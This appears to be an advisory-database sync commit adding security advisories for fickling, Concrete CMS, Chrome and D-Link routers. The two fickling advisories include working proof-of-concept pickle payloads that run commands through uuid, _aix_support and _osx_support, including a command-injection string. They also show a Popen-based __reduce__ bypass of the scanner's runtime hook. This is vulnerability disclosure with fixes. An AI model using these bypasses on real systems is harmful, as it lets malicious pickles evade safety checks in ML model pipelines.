Advisory Database Sync

Author: advisory-database[bot]

advisories/github-reviewed/2026/03/GHSA-5hwf-rc88-82xm/GHSA-5hwf-rc88-82xm.json

@@ -0,0 +1,62 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5hwf-rc88-82xm",
+  "modified": "2026-03-04T21:31:03Z",
+  "published": "2026-03-04T21:31:03Z",
+  "aliases": [],
+  "summary": "Fickling missing RCE-capable modules in UNSAFE_IMPORTS",
+  "details": "# Assessment\n\nThe modules `uuid`, `_osx_support` and `_aix_support` were added to the blocklist of unsafe imports (https://github.com/trailofbits/fickling/commit/ffac3479dbb97a7a1592d85991888562d34dd05b).\n\n# Original report\n\n## Summary\n\nfickling's `UNSAFE_IMPORTS` blocklist is missing at least 3 stdlib modules that provide direct arbitrary command execution: `uuid`, `_osx_support`, and `_aix_support`. These modules contain functions that internally call `subprocess.Popen()` or `os.system()` with attacker-controlled arguments. A malicious pickle file importing these modules passes both `UnsafeImports` and `NonStandardImports` checks.\n\n\n## Affected Versions\n\n- fickling <= 0.1.8 (all versions)\n\n## Details\n\n### Missing Modules\n\nfickling's `UNSAFE_IMPORTS` (86 modules) does not include:\n\n| Module | RCE Function | Internal Mechanism | Importable On |\n|--------|-------------|-------------------|---------------|\n| `uuid` | `_get_command_stdout(cmd, *args)` | `subprocess.Popen((cmd,) + args, stdout=PIPE, stderr=DEVNULL)` | All platforms |\n| `_osx_support` | `_read_output(cmdstring)` | `os.system(cmd)` via temp file | All platforms |\n| `_osx_support` | `_find_build_tool(toolname)` | Command injection via `%s` in `_read_output(\"/usr/bin/xcrun -find %s\" % toolname)` | All platforms |\n| `_aix_support` | `_read_cmd_output(cmdstring)` | `os.system(cmd)` via temp file | All platforms |\n\n**Critical note:** Despite the names `_osx_support` and `_aix_support` suggesting platform-specific modules, they are importable on ALL platforms. Python includes them in the standard distribution regardless of OS.\n\n### Why These Pass fickling\n\n1. **`NonStandardImports`**: These are stdlib modules, so `is_std_module()` returns True → not flagged\n2. **`UnsafeImports`**: Module names not in `UNSAFE_IMPORTS` → not flagged\n3. **`OvertlyBadEvals`**: Function names added to `likely_safe_imports` (stdlib) → skipped\n4. **`UnusedVariables`**: Defeated by BUILD opcode (purposely unhardend)\n\n### Proof of Concept (using fickling's opcode API)\n\n```python\nfrom fickling.fickle import (\n    Pickled, Proto, Frame, ShortBinUnicode, StackGlobal,\n    TupleOne, TupleTwo, Reduce, EmptyDict, SetItem, Build, Stop,\n)\nfrom fickling.analysis import check_safety\nimport struct, pickle\n\nframe_data = b\"\\x95\" + struct.pack(\"<Q\", 60)\n\n# uuid._get_command_stdout — works on ALL platforms\nuuid_payload = Pickled([\n    Proto(4),\n    Frame(struct.pack(\"<Q\", 60), data=frame_data),\n    ShortBinUnicode(\"uuid\"),\n    ShortBinUnicode(\"_get_command_stdout\"),\n    StackGlobal(),\n    ShortBinUnicode(\"echo\"),\n    ShortBinUnicode(\"PROOF_OF_CONCEPT\"),\n    TupleTwo(),\n    Reduce(),\n    EmptyDict(), ShortBinUnicode(\"x\"), ShortBinUnicode(\"y\"), SetItem(),\n    Build(),\n    Stop(),\n])\n\n# _aix_support._read_cmd_output — works on ALL platforms\naix_payload = Pickled([\n    Proto(4),\n    Frame(struct.pack(\"<Q\", 60), data=frame_data),\n    ShortBinUnicode(\"_aix_support\"),\n    ShortBinUnicode(\"_read_cmd_output\"),\n    StackGlobal(),\n    ShortBinUnicode(\"echo PROOF_OF_CONCEPT\"),\n    TupleOne(),\n    Reduce(),\n    EmptyDict(), ShortBinUnicode(\"x\"), ShortBinUnicode(\"y\"), SetItem(),\n    Build(),\n    Stop(),\n])\n\n# _osx_support._find_build_tool — command injection via %s\nosx_payload = Pickled([\n    Proto(4),\n    Frame(struct.pack(\"<Q\", 60), data=frame_data),\n    ShortBinUnicode(\"_osx_support\"),\n    ShortBinUnicode(\"_find_build_tool\"),\n    StackGlobal(),\n    ShortBinUnicode(\"x; echo INJECTED #\"),\n    TupleOne(),\n    Reduce(),\n    EmptyDict(), ShortBinUnicode(\"x\"), ShortBinUnicode(\"y\"), SetItem(),\n    Build(),\n    Stop(),\n])\n\n# All three: fickling reports LIKELY_SAFE\nfor name, p in [(\"uuid\", uuid_payload), (\"aix\", aix_payload), (\"osx\", osx_payload)]:\n    result = check_safety(p)\n    print(f\"{name}: severity={result.severity}, issues={len(result.results)}\")\n    # Output: severity=Severity.LIKELY_SAFE, issues=0\n\n# All three: pickle.loads() executes the command\npickle.loads(uuid_payload.dumps())  # prints PROOF_OF_CONCEPT\n```\n\n### Verified Output\n\n```\n$ python3 poc.py\nuuid: severity=Severity.LIKELY_SAFE, issues=0\naix: severity=Severity.LIKELY_SAFE, issues=0\nosx: severity=Severity.LIKELY_SAFE, issues=0\nPROOF_OF_CONCEPT\n```\n\n## Impact\n\nAn attacker can craft a pickle file that executes arbitrary system commands while fickling reports it as `LIKELY_SAFE`. This affects any system relying on fickling for pickle safety validation, including ML model loading pipelines.\n\n## Suggested Fix\n\nAdd to `UNSAFE_IMPORTS` in fickling:\n```python\n\"uuid\",\n\"_osx_support\",\n\"_aix_support\",\n```\n\n**Longer term:** Consider an allowlist approach — only permit known-safe stdlib modules rather than blocking known-dangerous ones. The current 86-module blocklist still has gaps because the Python stdlib contains hundreds of modules.\n\n## Resources\n\n- Python source: `Lib/uuid.py` lines 156-168 (`_get_command_stdout`)\n- Python source: `Lib/_osx_support.py` lines 35-52 (`_read_output`), lines 54-68 (`_find_build_tool`)\n- Python source: `Lib/_aix_support.py` lines 14-30 (`_read_cmd_output`)\n- fickling source: `analysis.py` `UNSAFE_IMPORTS` set",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "fickling"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.1.9"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.1.8"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-5hwf-rc88-82xm"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/trailofbits/fickling/commit/ffac3479dbb97a7a1592d85991888562d34dd05b"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/trailofbits/fickling"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-184"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-04T21:31:03Z",
+    "nvd_published_at": null
+  }
+}

…-gj26-w59c-29mf/GHSA-gj26-w59c-29mf.json …-gj26-w59c-29mf/GHSA-gj26-w59c-29mf.jsonadvisories/unreviewed/2026/03/GHSA-gj26-w59c-29mf/GHSA-gj26-w59c-29mf.json renamed to advisories/github-reviewed/2026/03/GHSA-gj26-w59c-29mf/GHSA-gj26-w59c-29mf.json advisories/unreviewed/2026/03/GHSA-gj26-w59c-29mf/GHSA-gj26-w59c-29mf.json renamed to advisories/github-reviewed/2026/03/GHSA-gj26-w59c-29mf/GHSA-gj26-w59c-29mf.json

@@ -1,40 +1,65 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-gj26-w59c-29mf",
-  "modified": "2026-03-04T03:31:34Z",
+  "modified": "2026-03-04T21:32:21Z",
   "published": "2026-03-04T03:31:34Z",
   "aliases": [
     "CVE-2026-3452"
   ],
-  "details": "Concrete CMS below version 9.4.8 is vulnerable to Remote Code Execution by stored PHP object injection into the Express Entry List block via the columns parameter. An authenticated administrator can store attacker-controlled serialized data in block configuration fields that are later passed to unserialize() without class restrictions or integrity checks. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.9 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks YJK ( @YJK0805 https://hackerone.com/yjk0805 ) of  ZUSO ART https://zuso.ai/  for reporting.",
+  "summary": "Concrete CMS vulnerable to Remote Code Execution by stored PHP object injection",
+  "details": "Concrete CMS below version 9.4.8 is vulnerable to Remote Code Execution by stored PHP object injection into the Express Entry List block via the columns parameter. An authenticated administrator can store attacker-controlled serialized data in block configuration fields that are later passed to unserialize() without class restrictions or integrity checks. \n\nThe Concrete CMS security team thanks YJK ( @YJK0805 https://hackerone.com/yjk0805 ) of  ZUSO ART https://zuso.ai/  for reporting.",
   "severity": [
     {
       "type": "CVSS_V4",
-      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+      "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "concrete5/concrete5"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "9.4.8"
+            }
+          ]
+        }
+      ]
     }
   ],
-  "affected": [],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3452"
     },
     {
       "type": "WEB",
-      "url": "https://github.com/concretecms/concretecms/pull/12826/changes/167f16e4805d8ab546d2997c753ac21bf4854920:"
+      "url": "https://github.com/concretecms/concretecms/pull/12826/changes/167f16e4805d8ab546d2997c753ac21bf4854920"
     },
     {
       "type": "WEB",
       "url": "https://documentation.concretecms.org/9-x/developers/introduction/version-history/948-release-notes"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/concretecms/concretecms"
     }
   ],
   "database_specific": {
     "cwe_ids": [
       "CWE-502"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-04T21:32:21Z",
     "nvd_published_at": "2026-03-04T02:15:54Z"
   }
 }

advisories/github-reviewed/2026/03/GHSA-wccx-j62j-r448/GHSA-wccx-j62j-r448.json

@@ -0,0 +1,66 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-wccx-j62j-r448",
+  "modified": "2026-03-04T21:30:16Z",
+  "published": "2026-03-04T21:30:16Z",
+  "aliases": [],
+  "summary": "Fickling has `always_check_safety()` bypass: pickle.loads and _pickle.loads remain unhooked",
+  "details": "# Assessment\n\nThe missing pickle entrypoints `pickle.loads`, `_pickle.loads`, and `_pickle.load` were added to the hook https://github.com/trailofbits/fickling/commit/8c24c6edabceab156cfd41f4d70b650e1cdad1f7.\n\n# Original report\n\n## Summary\n`fickling.always_check_safety()` does not hook all pickle entry points. `pickle.loads`, `_pickle.loads`, and `_pickle.load` remain unprotected, enabling malicious payload execution despite global safety mode being enabled.\n\n## Affected versions\n`<= 0.1.8` (verified on current upstream HEAD as of 2026-03-03)\n\n## Non-duplication check against published Fickling GHSAs\nNo published advisory covers hook-coverage bypass in `run_hook()`.\nExisting advisories are blocklist/detection bypasses (runpy, pty, cProfile, marshal/types, builtins, network constructors, OBJ visibility, etc.), not runtime hook coverage parity.\n\n## Root cause\n`run_hook()` patches only:\n- `pickle.load`\n- `pickle.Unpickler`\n- `_pickle.Unpickler`\n\nIt does not patch:\n- `pickle.loads`\n- `_pickle.load`\n- `_pickle.loads`\n\n## Reproduction (clean upstream)\n```python\nimport io, pickle, _pickle\nfrom unittest.mock import patch\nimport fickling\nfrom fickling.exception import UnsafeFileError\n\nclass Payload:\n    def __reduce__(self):\n        import subprocess\n        return (subprocess.Popen, (['echo','BYPASS'],))\n\ndata = pickle.dumps(Payload())\nfickling.always_check_safety()\n\n# Bypass path\nwith patch('subprocess.Popen') as popen_mock:\n    pickle.loads(data)\n    print('bypass sink called?', popen_mock.called)  # True\n\n# Control path is blocked\nwith patch('subprocess.Popen') as popen_mock:\n    try:\n        pickle.load(io.BytesIO(data))\n    except UnsafeFileError:\n        pass\n    print('blocked sink called?', popen_mock.called)  # False\n```\n\nObserved on vulnerable code:\n- `pickle.loads` executes payload\n- `pickle.load` is blocked\n\n## Minimal patch diff\n```diff\n--- a/fickling/hook.py\n+++ b/fickling/hook.py\n@@\n def run_hook():\n-    pickle.load = loader.load\n+    pickle.load = loader.load\n+    _pickle.load = loader.load\n+    pickle.loads = loader.loads\n+    _pickle.loads = loader.loads\n```\n\n## Validation after patch\n- `pickle.loads`, `_pickle.loads`, and `_pickle.load` all raise `UnsafeFileError`\n- sink not called in any path\n\nRegression tests added locally:\n- `test_run_hook_blocks_pickle_loads`\n- `test_run_hook_blocks__pickle_load_and_loads`\n  in `test/test_security_regressions_20260303.py`\n\n## Impact\nHigh-confidence runtime protection bypass for applications that trust `always_check_safety()` as global guard.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "fickling"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.1.9"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.1.8"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-wccx-j62j-r448"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/trailofbits/fickling/commit/8c24c6edabceab156cfd41f4d70b650e1cdad1f7"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/trailofbits/fickling"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.9"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-693"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-04T21:30:16Z",
+    "nvd_published_at": null
+  }
+}

advisories/unreviewed/2026/01/GHSA-gjxw-mrg7-952f/GHSA-gjxw-mrg7-952f.json

@@ -30,7 +30,8 @@
   ],
   "database_specific": {
     "cwe_ids": [
-      "CWE-120"
+      "CWE-120",
+      "CWE-401"
     ],
     "severity": "MODERATE",
     "github_reviewed": false,

advisories/unreviewed/2026/02/GHSA-hh4j-fpgp-7x26/GHSA-hh4j-fpgp-7x26.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-hh4j-fpgp-7x26",
-  "modified": "2026-02-10T21:31:31Z",
+  "modified": "2026-03-04T21:32:40Z",
   "published": "2026-02-10T21:31:31Z",
   "aliases": [
     "CVE-2026-1762"
@@ -19,6 +19,10 @@
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1762"
     },
+    {
+      "type": "WEB",
+      "url": "https://www.gevernova.com/content/dam/cyber_security/global/en_US/pdfs/ges-2025-005.pdf"
+    },
     {
       "type": "WEB",
       "url": "https://www.gevernova.com/grid-solutions/resources?prod=urfamily&type=21&node_id=4987&check_logged_in=1"

advisories/unreviewed/2026/02/GHSA-w49w-5662-qw44/GHSA-w49w-5662-qw44.json

@@ -1,7 +1,7 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-w49w-5662-qw44",
-  "modified": "2026-02-27T15:34:11Z",
+  "modified": "2026-03-04T21:32:40Z",
   "published": "2026-02-10T21:31:31Z",
   "aliases": [
     "CVE-2026-1763"
@@ -23,6 +23,10 @@
       "type": "WEB",
       "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-048-03"
     },
+    {
+      "type": "WEB",
+      "url": "https://www.gevernova.com/content/dam/cyber_security/global/en_US/pdfs/ges-2025-005.pdf"
+    },
     {
       "type": "WEB",
       "url": "https://www.gevernova.com/grid-solutions/passport/login?destination=resources%3Fprod%3Durfamily%26type%3D21%26node_id%3D4987%26check_logged_in%3D1"

advisories/unreviewed/2026/03/GHSA-27mg-gqcr-w5x5/GHSA-27mg-gqcr-w5x5.json

@@ -0,0 +1,35 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-27mg-gqcr-w5x5",
+  "modified": "2026-03-04T21:32:46Z",
+  "published": "2026-03-04T21:32:46Z",
+  "aliases": [
+    "CVE-2026-3544"
+  ],
+  "details": "Heap buffer overflow in WebCodecs in Google Chrome prior to 145.0.7632.159 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)",
+  "severity": [],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3544"
+    },
+    {
+      "type": "WEB",
+      "url": "https://chromereleases.googleblog.com/2026/03/stable-channel-update-for-desktop.html"
+    },
+    {
+      "type": "WEB",
+      "url": "https://issues.chromium.org/issues/485683110"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-122"
+    ],
+    "severity": null,
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-04T20:16:21Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-2r28-vjg7-2q9r/GHSA-2r28-vjg7-2q9r.json

@@ -0,0 +1,37 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-2r28-vjg7-2q9r",
+  "modified": "2026-03-04T21:32:46Z",
+  "published": "2026-03-04T21:32:46Z",
+  "aliases": [
+    "CVE-2025-46108"
+  ],
+  "details": "D-link Dir-513 A1FW110 is vulnerable to Buffer Overflow in the function formTcpipSetup.",
+  "severity": [],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46108"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/akuma-QAQ/CVEreport/tree/main/D-link/CVE-2025-46108"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/buobo/bo-s-CVE/blob/main/DIR-513/formTcpipSetup.md"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.dlink.com/en/security-bulletin"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [],
+    "severity": null,
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-04T21:16:01Z"
+  }
+}

advisories/unreviewed/2026/03/GHSA-39w2-w255-frc6/GHSA-39w2-w255-frc6.json

@@ -0,0 +1,37 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-39w2-w255-frc6",
+  "modified": "2026-03-04T21:32:46Z",
+  "published": "2026-03-04T21:32:46Z",
+  "aliases": [
+    "CVE-2025-70225"
+  ],
+  "details": "Stack buffer overflow vulnerability in D-Link DIR-513 v1.10 via the curtime parameter to the goform/formEasySetupWWConfig component",
+  "severity": [],
+  "affected": [],
+  "references": [
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70225"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/akuma-QAQ/CVEreport/tree/main/D-link/CVE-2025-70225"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DIR-513"
+    },
+    {
+      "type": "WEB",
+      "url": "https://www.dlink.com/en/security-bulletin"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [],
+    "severity": null,
+    "github_reviewed": false,
+    "github_reviewed_at": null,
+    "nvd_published_at": "2026-03-04T21:16:02Z"
+  }
+}